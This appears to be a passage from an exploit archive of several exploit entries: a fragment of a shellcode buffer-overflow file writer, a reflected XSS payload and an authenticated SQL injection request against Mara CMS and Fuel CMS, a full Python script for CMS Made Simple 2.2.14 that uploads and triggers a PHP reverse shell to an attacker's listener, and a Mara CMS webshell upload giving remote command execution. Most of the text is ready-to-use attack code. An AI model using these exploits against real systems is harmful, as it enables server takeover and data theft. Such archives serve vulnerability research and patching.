"\x7c\xd7\x8c\x8a\xb2\x15\x92\xcb\xa6\xd2\xaf\xaf\x1c\x33\xa5" "\xae\xd6\x19\x61\x31\x02\xfb\xe2\x3d\x9f\x8f\xaf\x21\x1e\x7b" "\xc4\x5d\xab\x7a\x33\xd4\xef\x58\xdf\x87\x2c\x12\xd7\x6e\x67" "\xda\x0d\xf9\x45\xb5\x43\xb7\x47\xaa\x0e\xaf\xc7\xcd\x50\xd0" "\x71\x74\xab\x95\xfc\xaf\x51\x9a\x87\x4c\xb2\x0e\x60\xe2\x45" "\x51\x8f\x72\xfc\xa5\x18\xe9\x93\x95\x99\x99\x58\xe7\x37\x3e" "\xf7\x72\x3b\xdb\x75\x4c\x60\xab\x26\x88\x9c\x25\x30\x86\x5f" "\x60\xb9\xaf\x62\xdb\x7a\x07\xc0\x91\xc0\xd0\x19\x0e\x6b\x36" "\x7e\xb1\x74\x39\xe9\x22\xf3\x9d\xca\xd4\x62\x7a\x6e\x67\x0d" "\xc9\x15\x14\xbe\xe0\x0e\x52\x1c\x26\xbb\xea\x7e\x4e\xcb\xb4" "\xa0\xae\x43\x20\xcc\xcf\xff\x9b\xc7\x87\x4c\xf8\xd2\x1e\xad" "\x31\x0f\x72\x7d\x63\xfd\x8d\x51\xb2\xc1\x21\xad\xe0\xc9" ) buf += '\x90\x90\x90\x90'*5 buf += 'E'*200 bfile.write(buf) bfile.close()

# Exploit Title: Mara CMS 7.5 - Reflective Cross-Site Scripting # Google Dork: NA # Date: 2020-08-01 # Exploit Author: George Tsimpidas # Vendor Homepage: https://sourceforge.net/projects/maracms/ # Software Link: https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download # Version: 7.5 # Tested on: Kali Linux(x64) # CVE : CVE-2020-24223 Mara CMS 7.5 suffers from a Reflected Cross Site Scripting vulnerability. Description : This Reflected XSS vulnerability allows any authenticated user to inject malicious code via the parameter contact.php?theme=<inject>. The vulnerability exists because the parameter is not properly sanitized and this can lead to malicious code injection that will be executed on the target’s browser. PoC : Use Payload : seven69387';alert(1)//154 Path : http://localhost/contact.php?theme=< inject payload here> Injection Example : http://localhost/contact.php?theme=seven69387';alert(1)//154

# Exploit Title: Fuel CMS 1.4.8 - 'fuel_replace_id' SQL Injection (Authenticated) # Date: 2020-08-19 # Exploit Author: c0mpu7er（@ymbank.cn） # Vendor Homepage: https://www.getfuelcms.com/ # Software Link: https://github.com/daylightstudio/FUEL-CMS/archive/1.4.8.zip # Version: 1.4.7 # Tested on: PHP 5.4.45, Apache 2.4.23 ,mysql 5.0 1. Description: ---------------------- FUEL CMS 1.4.8 allows SQL Injection via parameter 'fuel_replace_id' in pages/replace/1 Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 2. Proof of Concept: ---------------------- In Burpsuite intercept the request from one of the affected pages with 'fuel_replace_id' parameter and save it like 33.txt Then run SQLmap to extract the data from the database: python sqlmap.py -r 33.txt --dbs 3.Example payload: Content-Disposition: form-data; name="fuel_replace_id" 11%27 4. Burpsuite request payload: ---------------------- POST /FUEL-CMS-1.4.8/fuel/pages/replace/1?inline=1 HTTP/1.1 Host: 192.168.1.12 Content-Length: 347 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.1.12 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygI1zKZoBINTcL87g User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.1.12/FUEL-CMS-1.4.8/fuel/pages/replace/1?lang=english Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: fuel_ac82b68172fd46789948eb8e66216180=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22language%22%3Bs%3A0%3A%22%22%3B%7D; fuel_ui_ac82b68172fd46789948eb8e66216180=%257B%2522leftnav_h3%2522%253A%25220%257C0%257C0%257C0%2522%252C%2522fuel_pages_items%2522%253A%2522list%2522%252C%2522tabs_pages_create%2522%253A%25220%2522%252C%2522fuel_navigation_items%2522%253A%2522list%2522%252C%2522tabs_navigation_create%2522%253A%25220%2522%252C%2522tabs_pages_edit_1%2522%253A%25220%2522%257D; ci_session=db8df72tccrt8vnr2uaqnckv5ak4n135 Connection: close ------WebKitFormBoundarygI1zKZoBINTcL87g Content-Disposition: form-data; name="fuel_replace_id" 11* ------WebKitFormBoundarygI1zKZoBINTcL87g Content-Disposition: form-data; name="Submit" Submit ------WebKitFormBoundarygI1zKZoBINTcL87g Content-Disposition: form-data; name="fuel_inline" 1 ------WebKitFormBoundarygI1zKZoBINTcL87g-- 5. Timeline: ---------------------- 2020-08-20: SQLi vulnerability found in Fuel CMS 1.4.8 2020-08-20: Reported vulnerability to vendor 2020-08-22: Vendor has patched the SQLi vulnerability in version 1.4.9

#!/usr/bin/python3 #-*- coding: utf-8 -*- # Exploit Title: CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated) # Google Dork: N/A # Date: 2020-08-31 # Exploit Author: Luis Noriega (@nogagmx) # Vendor Homepage: https://www.cmsmadesimple.org/ # Software Link: http://s3.amazonaws.com/cmsms/downloads/14793/cmsms-2.2.14-install.zip # Version: 2.2.14 # Tested on: Linux Ubuntu 18.04.4 LTS # CVE : N/A # Usage: # python3 exploit.py --url http://URL/cmsms/admin/login.php -u admin -p password -lhost LHOST -lport LPORT from urllib.parse import urlparse import requests import argparse import string import random import json import sys def parse_url(URL): t = urlparse(URL) return t.scheme+'://'+t.netloc+t.path.split('login.php')[0] + 'moduleinterface.php' parser = argparse.ArgumentParser(description='CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload - PHP Reverse Shell') parser.add_argument('--url', dest='URL', help='URL to admin pane </admin/login.php>', required=True) parser.add_argument('-u', dest='USERNAME', help='Username', required=True) parser.add_argument('-p', dest='PASSWORD', help='Password', required=True) parser.add_argument('-lhost', dest='IP', help='The listen address', required=True) parser.add_argument('-lport', dest='PORT', help='The listen port', required=True) args = parser.parse_args() login_data = {'username':"", "password":"", "loginsubmit": "Submit"} PAYLOAD = '<?php set_time_limit (0); $VERSION = "1.0"; $ip = "%s"; $port = "%s"; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = "uname -a; w; id; /bin/bash -i"; $daemon = 0; $debug = 0; if (function_exists("pcntl_fork")) { $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Cannot fork"); exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { printit("Error: Cannot setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Cannot spawn shell"); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) { if (!$daemon) { print "$string\n"; } } ?>'% (args.IP,args.PORT) FILENAME = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(5)) + '.phar' file = {'m1_files[]': (FILENAME, PAYLOAD)} upload_data = {"mact":"FileManager,m1_,upload,0", "__c":"", "disable_buffer":"1"} URL_UPLOAD = parse_url(args.URL) print("[ + ] Connection to the CMS Made Simple Admin Portal located at "+ args.URL) print("[ + ] Using "+ args.USERNAME +":"+ args.PASSWORD); login_data['username'] = args.USERNAME; login_data['password'] = args.PASSWORD try: session = requests.session() req = session.post(args.URL, data=login_data) upload_data["__c"] = session.cookies["__c"] print ("[ + ] %s logged successfully!"%(args.USERNAME)) response = requests.post(URL_UPLOAD, files=file, cookies=session.cookies,data=upload_data) data = response.json() print ("[ + ] %s file uploaded."%(FILENAME)) URL_TRIGGER = data[0]['url'] input("[ ! ] Set up your nc listener <nc -nvlp %s>, then press any to exploit.."%(args.PORT)) print ("[ + ] Pwned!!") response = requests.get(URL_TRIGGER, cookies=session.cookies) print ("[ + ] Bye") except: print ("[ x ] Something went wrong, try again.") sys.exit(1)

# Exploit Title: Mara CMS 7.5 - Remote Code Execution (Authenticated) # Google Dork: N/A # Date: 2020-08-31 # Exploit Author: Michele Cisternino (0blio_) # Vendor Homepage: https://sourceforge.net/projects/maracms/ # Software Link: https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download # Version: 7.5 # Tested on: Kali Linux(x64) # CVE: N/A # Description MaraCMS 7.5 is vulnerable to Authenticated Remote Code Execution. In order to exploit the vulnerability, an attacker must have a valid authenticated session on the CMS as 'admin' or 'manager'. The file uploader fails to check extensions of files uploaded by the user, so it is possible to upload a webshell and get RCE. # PoC 1. Login on MaraCMS. Default credentials are: Username: admin Password: changeme 2. Navigate the file upload functionality (http://target/codebase/dir.php?type=filenew) and upload a file called 'webshell.php' with content '<?php system($_GET["cmd"]); ?>'. A request similar to the following will be made: POST /codebase/handler.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------1202504167994776142974823268 Content-Length: 1282 Origin: http://localhost Connection: close Referer: http://localhost/codebase/dir.php?type=filenew Cookie: your_sitename_session_session=krevi5f3gr416p3o7cqdk4j1vv Upgrade-Insecure-Requests: 1 -----------------------------1202504167994776142974823268 Content-Disposition: form-data; name="authenticated" MQ== -----------------------------1202504167994776142974823268 Content-Disposition: form-data; name="action" dXBsb2Fk -----------------------------1202504167994776142974823268 Content-Disposition: form-data; name="MAX_FILE_SIZE" 10485760 -----------------------------1202504167994776142974823268 Content-Disposition: form-data; name="type" filenew -----------------------------1202504167994776142974823268 Content-Disposition: form-data; name="files[]"; filename="webshell.php" Content-Type: application/x-php <?php system($_GET["cmd"]); ?> -----------------------------1202504167994776142974823268 Content-Disposition: form-data; name="usr" YWRtaW4= -----------------------------1202504167994776142974823268 Content-Disposition: form-data; name="pwd" MWUyNzUwMTA3OTgyNzQ2NTQ5ZDZlYWY0MWNmMzcwZTBlZTc3NWNiNWZiNTExMWNhOGI5ZWNjNWI0M2JkOGE2NA== -----------------------------1202504167994776142974823268 Content-Disposition: form-data; name="authenticated" MQ== -----------------------------1202504167994776142974823268 Content-Disposition: form-data; name="destdir" -----------------------------1202504167994776142974823268-- 3. Execute remote commands by navigating: http://target/webshell.php?cmd=whoami